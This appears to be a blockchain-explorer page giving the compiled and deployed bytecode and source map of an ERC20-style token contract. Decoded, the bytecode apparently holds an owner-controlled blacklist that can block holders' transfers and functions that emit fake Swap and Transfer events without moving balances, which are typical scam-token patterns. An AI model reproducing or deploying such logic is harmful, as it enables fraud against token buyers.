908315150217905550808061073090611a59565b91505061069f565b505050565b5f80610747610e10565b90506107688185856107598589610d0c565b6107639190611aa0565b610e17565b600191505092915050565b61077b6113ca565b80600a5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f5b8484905081101561093e578484828181106107de576107dd61197a565b5b90506020020160208101906107f3919061188c565b73ffffffffffffffffffffffffffffffffffffffff1660085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822855f80876040516108769493929190611ad3565b60405180910390a38484828181106108915761089061197a565b5b90506020020160208101906108a6919061188c565b73ffffffffffffffffffffffffffffffffffffffff16600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161092391906117a4565b60405180910390a3808061093690611a59565b9150506107c0565b5050505050565b61094d6113ca565b5f5b82829050811015610aa457600160025f8585858181106109725761097161197a565b5b9050602002016020810190610987919061188c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff16838383818110610a00576109ff61197a565b5b9050602002016020810190610a15919061188c565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925610a7c868686818110610a6257610a6161197a565b5b9050602002016020810190610a77919061188c565b610aa9565b604051610a8991906117a4565b60405180910390a38080610a9c90611a59565b91505061094f565b505050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610af76113ca565b610b005f611448565b565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b8a9061194a565b80601f0160208091040260200160405190810160405280929190818152602001828054610bb69061194a565b8015610c015780601f10610bd857610100808354040283529160200191610c01565b820191905f5260205f20905b815481529060010190602001808311610be457829003601f168201915b5050505050905090565b5f80610c15610e10565b90505f610c228286610d0c565b905083811015610c67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5e90611b86565b60405180910390fd5b610c748286868403610e17565b60019250505092915050565b5f80610c8a610e10565b9050610c97818585611065565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cff91906117a4565b60405180910390a3505050565b5f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610d966113ca565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e04576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dfb90611c14565b60405180910390fd5b610e0d81611448565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e7c90611ca2565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ef3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eea90611d30565b60405180910390fd5b8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610fcd91906117a4565b60405180910390a3505050565b5f610fe58484610d0c565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461105f5781811015611051576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161104890611d98565b60405180910390fd5b61105e8484848403610e17565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036110d3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ca90611e26565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611141576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113890611eb4565b60405180910390fd5b61114c838383611509565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156111d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111c790611f42565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806112f9575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15611354576001151560055f9054906101000a900460ff16151514611353576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134a90611f83565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113b191906117a4565b60405180910390a36113c484848461150e565b50505050565b6113d2610e10565b73ffffffffffffffffffffffffffffffffffffffff166113f0610b54565b73ffffffffffffffffffffffffffffffffffffffff1614611446576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161143d90611feb565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561154a57808201518184015260208101905061152f565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61156f82611513565b611579818561151d565b935061158981856020860161152d565b61159281611555565b840191505092915050565b5f6020820190508181035f8301526115b58184611565565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6115ee826115c5565b9050919050565b6115fe816115e4565b8114611608575f80fd5b50565b5f81359050611619816115f5565b92915050565b5f819050919050565b6116318161161f565b811461163b575f80fd5b50565b5f8135905061164c81611628565b92915050565b5f8060408385031215611668576116676115bd565b5b5f6116758582860161160b565b92505060206116868582860161163e565b9150509250929050565b5f8115159050919050565b6116a481611690565b82525050565b5f6020820190506116bd5f83018461169b565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126116e4576116e36116c3565b5b8235905067ffffffffffffffff811115611701576117006116c7565b5b60208301915083602082028301111561171d5761171c6116cb565b5b9250929050565b5f805f806060858703121561173c5761173b6115bd565b5b5f85013567ffffffffffffffff811115611759576117586115c1565b5b611765878288016116cf565b945094505060206117788782880161163e565b92505060406117898782880161163e565b91505092959194509250565b61179e8161161f565b82525050565b5f6020820190506117b75f830184611795565b92915050565b5f805f606084860312156117d4576117d36115bd565b5b5f6117e18682870161160b565b93505060206117f28682870161160b565b92505060406118038682870161163e565b9150509250925092565b5f60ff82169050919050565b6118228161180d565b82525050565b5f60208201905061183b5f830184611819565b92915050565b5f8060208385031215611857576118566115bd565b5b5f83013567ffffffffffffffff811115611874576118736115c1565b5b611880858286016116cf565b92509250509250929050565b5f602082840312156118a1576118a06115bd565b5b5f6118ae8482850161160b565b91505092915050565b6118c0816115e4565b82525050565b5f6020820190506118d95f8301846118b7565b92915050565b5f80604083850312156118f5576118f46115bd565b5b5f6119028582860161160b565b92505060206119138582860161160b565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061196157607f821691505b6020821081036119745761197361191d565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f819050919050565b5f819050919050565b5f6119d36119ce6119c9846119a7565b6119b0565b61161f565b9050919050565b6119e3816119b9565b82525050565b5f6080820190506119fc5f8301876119da565b611a096020830186611795565b611a166040830185611795565b611a2360608301846119da565b95945050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611a638261161f565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611a9557611a94611a2c565b5b600182019050919050565b5f611aaa8261161f565b9150611ab58361161f565b9250828201905080821115611acd57611acc611a2c565b5b92915050565b5f608082019050611ae65f830187611795565b611af360208301866119da565b611b0060408301856119da565b611b0d6060830184611795565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611b7060258361151d565b9150611b7b82611b16565b604082019050919050565b5f6020820190508181035f830152611b9d81611b64565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611bfe60268361151d565b9150611c0982611ba4565b604082019050919050565b5f6020820190508181035f830152611c2b81611bf2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611c8c60248361151d565b9150611c9782611c32565b604082019050919050565b5f6020820190508181035f830152611cb981611c80565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611d1a60228361151d565b9150611d2582611cc0565b604082019050919050565b5f6020820190508181035f830152611d4781611d0e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611d82601d8361151d565b9150611d8d82611d4e565b602082019050919050565b5f6020820190508181035f830152611daf81611d76565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611e1060258361151d565b9150611e1b82611db6565b604082019050919050565b5f6020820190508181035f830152611e3d81611e04565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611e9e60238361151d565b9150611ea982611e44565b604082019050919050565b5f6020820190508181035f830152611ecb81611e92565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611f2c60268361151d565b9150611f3782611ed2565b604082019050919050565b5f6020820190508181035f830152611f5981611f20565b9050919050565b50565b5f611f6e5f8361151d565b9150611f7982611f60565b5f82019050919050565b5f6020820190508181035f830152611f9a81611f63565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611fd560208361151d565b9150611fe082611fa1565b602082019050919050565b5f6020820190508181035f83015261200281611fc9565b905091905056fea264697066735822122002b23a6e97967ce39f89cd42c80c35d6c6c5ec04a44e234c04609a4229c1d6ea64736f6c63430008140033

Deployed Bytecode

0x608060405234801561000f575f80fd5b5060043610610135575f3560e01c80636ed073f1116100b657806395d89b411161007a57806395d89b4114610337578063a457c2d714610355578063a9059cbb14610385578063beabacc8146103b5578063dd62ed3e146103d1578063f2fde38b1461040157610135565b80636ed073f11461029357806370a08231146102af578063715018a6146102df5780637de2b11e146102e95780638da5cb5b1461031957610135565b8063313ce567116100fd578063313ce567146101f15780633824c0891461020f578063395093511461022b57806366d382031461025b57806367561abb1461027757610135565b806306fdde0314610139578063095ea7b3146101575780630ca12b3d1461018757806318160ddd146101a357806323b872dd146101c1575b5f80fd5b61014161041d565b60405161014e919061159d565b60405180910390f35b610171600480360381019061016c9190611652565b6104ad565b60405161017e91906116aa565b60405180910390f35b6101a1600480360381019061019c9190611724565b6104cf565b005b6101ab610656565b6040516101b891906117a4565b60405180910390f35b6101db60048036038101906101d691906117bd565b61065f565b6040516101e891906116aa565b60405180910390f35b6101f961068d565b6040516102069190611828565b60405180910390f35b61022960048036038101906102249190611841565b610695565b005b61024560048036038101906102409190611652565b61073d565b60405161025291906116aa565b60405180910390f35b6102756004803603810190610270919061188c565b610773565b005b610291600480360381019061028c9190611724565b6107be565b005b6102ad60048036038101906102a89190611841565b610945565b005b6102c960048036038101906102c4919061188c565b610aa9565b6040516102d691906117a4565b60405180910390f35b6102e7610aef565b005b61030360048036038101906102fe919061188c565b610b02565b60405161031091906116aa565b60405180910390f35b610321610b54565b60405161032e91906118c6565b60405180910390f35b61033f610b7b565b60405161034c919061159d565b60405180910390f35b61036f600480360381019061036a9190611652565b610c0b565b60405161037c91906116aa565b60405180910390f35b61039f600480360381019061039a9190611652565b610c80565b6040516103ac91906116aa565b60405180910390f35b6103cf60048036038101906103ca91906117bd565b610ca2565b005b6103eb60048036038101906103e691906118df565b610d0c565b6040516103f891906117a4565b60405180910390f35b61041b6004803603810190610416919061188c565b610d8e565b005b60606006805461042c9061194a565b80601f01602080910402602001604051908101604052809291908181526020018280546104589061194a565b80156104a35780601f1061047a576101008083540402835291602001916104a3565b820191905f5260205f20905b81548152906001019060200180831161048657829003601f168201915b5050505050905090565b5f806104b7610e10565b90506104c4818585610e17565b600191505092915050565b5f5b8484905081101561064f578484828181106104ef576104ee61197a565b5b9050602002016020810190610504919061188c565b73ffffffffffffffffffffffffffffffffffffffff1660085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8225f86865f60405161058794939291906119e9565b60405180910390a3600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168585838181106105da576105d961197a565b5b90506020020160208101906105ef919061188c565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8560405161063491906117a4565b60405180910390a3808061064790611a59565b9150506104d1565b5050505050565b5f600454905090565b5f80610669610e10565b9050610676858285610fda565b610681858585611065565b60019150509392505050565b5f6012905090565b61069d6113ca565b5f5b82829050811015610738575f60025f8585858181106106c1576106c061197a565b5b90506020020160208101906106d6919061188c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061073090611a59565b91505061069f565b505050565b5f80610747610e10565b90506107688185856107598589610d0c565b6107639190611aa0565b610e17565b600191505092915050565b61077b6113ca565b80600a5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f5b8484905081101561093e578484828181106107de576107dd61197a565b5b90506020020160208101906107f3919061188c565b73ffffffffffffffffffffffffffffffffffffffff1660085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d822855f80876040516108769493929190611ad3565b60405180910390a38484828181106108915761089061197a565b5b90506020020160208101906108a6919061188c565b73ffffffffffffffffffffffffffffffffffffffff16600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161092391906117a4565b60405180910390a3808061093690611a59565b9150506107c0565b5050505050565b61094d6113ca565b5f5b82829050811015610aa457600160025f8585858181106109725761097161197a565b5b9050602002016020810190610987919061188c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff16838383818110610a00576109ff61197a565b5b9050602002016020810190610a15919061188c565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925610a7c868686818110610a6257610a6161197a565b5b9050602002016020810190610a77919061188c565b610aa9565b604051610a8991906117a4565b60405180910390a38080610a9c90611a59565b91505061094f565b505050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610af76113ca565b610b005f611448565b565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b8a9061194a565b80601f0160208091040260200160405190810160405280929190818152602001828054610bb69061194a565b8015610c015780601f10610bd857610100808354040283529160200191610c01565b820191905f5260205f20905b815481529060010190602001808311610be457829003601f168201915b5050505050905090565b5f80610c15610e10565b90505f610c228286610d0c565b905083811015610c67576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5e90611b86565b60405180910390fd5b610c748286868403610e17565b60019250505092915050565b5f80610c8a610e10565b9050610c97818585611065565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cff91906117a4565b60405180910390a3505050565b5f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610d966113ca565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e04576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dfb90611c14565b60405180910390fd5b610e0d81611448565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e7c90611ca2565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ef3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eea90611d30565b60405180910390fd5b8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610fcd91906117a4565b60405180910390a3505050565b5f610fe58484610d0c565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461105f5781811015611051576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161104890611d98565b60405180910390fd5b61105e8484848403610e17565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036110d3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ca90611e26565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611141576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113890611eb4565b60405180910390fd5b61114c838383611509565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156111d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111c790611f42565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254019250508190555060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16806112f9575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b15611354576001151560055f9054906101000a900460ff16151514611353576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161134a90611f83565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516113b191906117a4565b60405180910390a36113c484848461150e565b50505050565b6113d2610e10565b73ffffffffffffffffffffffffffffffffffffffff166113f0610b54565b73ffffffffffffffffffffffffffffffffffffffff1614611446576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161143d90611feb565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561154a57808201518184015260208101905061152f565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61156f82611513565b611579818561151d565b935061158981856020860161152d565b61159281611555565b840191505092915050565b5f6020820190508181035f8301526115b58184611565565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6115ee826115c5565b9050919050565b6115fe816115e4565b8114611608575f80fd5b50565b5f81359050611619816115f5565b92915050565b5f819050919050565b6116318161161f565b811461163b575f80fd5b50565b5f8135905061164c81611628565b92915050565b5f8060408385031215611668576116676115bd565b5b5f6116758582860161160b565b92505060206116868582860161163e565b9150509250929050565b5f8115159050919050565b6116a481611690565b82525050565b5f6020820190506116bd5f83018461169b565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126116e4576116e36116c3565b5b8235905067ffffffffffffffff811115611701576117006116c7565b5b60208301915083602082028301111561171d5761171c6116cb565b5b9250929050565b5f805f806060858703121561173c5761173b6115bd565b5b5f85013567ffffffffffffffff811115611759576117586115c1565b5b611765878288016116cf565b945094505060206117788782880161163e565b92505060406117898782880161163e565b91505092959194509250565b61179e8161161f565b82525050565b5f6020820190506117b75f830184611795565b92915050565b5f805f606084860312156117d4576117d36115bd565b5b5f6117e18682870161160b565b93505060206117f28682870161160b565b92505060406118038682870161163e565b9150509250925092565b5f60ff82169050919050565b6118228161180d565b82525050565b5f60208201905061183b5f830184611819565b92915050565b5f8060208385031215611857576118566115bd565b5b5f83013567ffffffffffffffff811115611874576118736115c1565b5b611880858286016116cf565b92509250509250929050565b5f602082840312156118a1576118a06115bd565b5b5f6118ae8482850161160b565b91505092915050565b6118c0816115e4565b82525050565b5f6020820190506118d95f8301846118b7565b92915050565b5f80604083850312156118f5576118f46115bd565b5b5f6119028582860161160b565b92505060206119138582860161160b565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061196157607f821691505b6020821081036119745761197361191d565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f819050919050565b5f819050919050565b5f6119d36119ce6119c9846119a7565b6119b0565b61161f565b9050919050565b6119e3816119b9565b82525050565b5f6080820190506119fc5f8301876119da565b611a096020830186611795565b611a166040830185611795565b611a2360608301846119da565b95945050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611a638261161f565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611a9557611a94611a2c565b5b600182019050919050565b5f611aaa8261161f565b9150611ab58361161f565b9250828201905080821115611acd57611acc611a2c565b5b92915050565b5f608082019050611ae65f830187611795565b611af360208301866119da565b611b0060408301856119da565b611b0d6060830184611795565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611b7060258361151d565b9150611b7b82611b16565b604082019050919050565b5f6020820190508181035f830152611b9d81611b64565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611bfe60268361151d565b9150611c0982611ba4565b604082019050919050565b5f6020820190508181035f830152611c2b81611bf2565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611c8c60248361151d565b9150611c9782611c32565b604082019050919050565b5f6020820190508181035f830152611cb981611c80565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611d1a60228361151d565b9150611d2582611cc0565b604082019050919050565b5f6020820190508181035f830152611d4781611d0e565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611d82601d8361151d565b9150611d8d82611d4e565b602082019050919050565b5f6020820190508181035f830152611daf81611d76565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611e1060258361151d565b9150611e1b82611db6565b604082019050919050565b5f6020820190508181035f830152611e3d81611e04565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611e9e60238361151d565b9150611ea982611e44565b604082019050919050565b5f6020820190508181035f830152611ecb81611e92565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611f2c60268361151d565b9150611f3782611ed2565b604082019050919050565b5f6020820190508181035f830152611f5981611f20565b9050919050565b50565b5f611f6e5f8361151d565b9150611f7982611f60565b5f82019050919050565b5f6020820190508181035f830152611f9a81611f63565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611fd560208361151d565b9150611fe082611fa1565b602082019050919050565b5f6020820190508181035f83015261200281611fc9565b905091905056fea264697066735822122002b23a6e97967ce39f89cd42c80c35d6c6c5ec04a44e234c04609a4229c1d6ea64736f6c63430008140033

Deployed Bytecode Sourcemap

81:140:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2392:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5994:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4012:299;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4805:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6753:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3329:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4440:192;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7434:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2244:83;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3706:300;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3426:274;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4969:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:0;;;:::i;:::-;;4638:107:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1834:85:0;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2603:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8155:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5290:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4317:117;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5537:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2707:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2392:98:1;2446:13;2478:5;2471:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2392:98;:::o;5994:197::-;6077:4;6093:13;6109:12;:10;:12::i;:::-;6093:28;;6131:32;6140:5;6147:7;6156:6;6131:8;:32::i;:::-;6180:4;6173:11;;;5994:197;;;